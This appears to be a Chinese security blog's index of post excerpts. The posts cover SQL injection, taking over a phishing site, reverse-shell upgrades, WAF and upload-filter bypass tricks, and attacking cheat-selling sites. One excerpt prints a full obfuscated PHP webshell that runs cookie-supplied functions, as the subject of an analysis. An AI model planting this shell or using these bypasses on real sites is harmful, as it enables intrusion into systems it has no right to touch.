1 前言前几天晚上做了一个梦,梦里进行了一些测试,今天觉得应该记录一下。 本文纯属虚构,如有雷同纯属放屁。 2 正文梦里发现了一处mssql报错注入
1 前言某天收到一封邮件 一看就是钓鱼邮件,并且我也不玩LOL。 看了看感觉这个系统好像见过很多次,研究了一下,顺手日了下来 过程比较有意思,遇到了
1 前言看hack the box的视频的时候,发现ippsec不喜欢用蚁剑,喜欢弹个shell回来。 然后一顿操作把一个简单的shell就升级到了一个
1 前言 1 2 3 <?php $p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p=$p[91]($p[90],$p[59]($p[31])))&&$p()):$p; ?> 星球里有很多同学想让我对这个shell写一篇解析,看了下确实比较有意思,并且顺便也想讲一些自己的想法。 2 语法分析比较复杂的
九世发在星球里的文章,因为比较敏感就放在博客上了。 绕过的方法: 三个点: 1.后缀名回车分割 2.删除Content-Type头 3.垃圾数据填充 1
向吃鸡外挂站开炮(一) 向吃鸡外挂站开炮(二) 1 前言第三篇终于写好了,也算是比较有意思的一篇,遇到了很多坑,也用上了很多小技巧,写出来博君一笑
1 前言模块很早就写好了,今天才有时间把文章写出来 大家都知道填充垃圾数据可以用于SQL注入的绕过,原理就是WAF在遇到大量的GET或者POST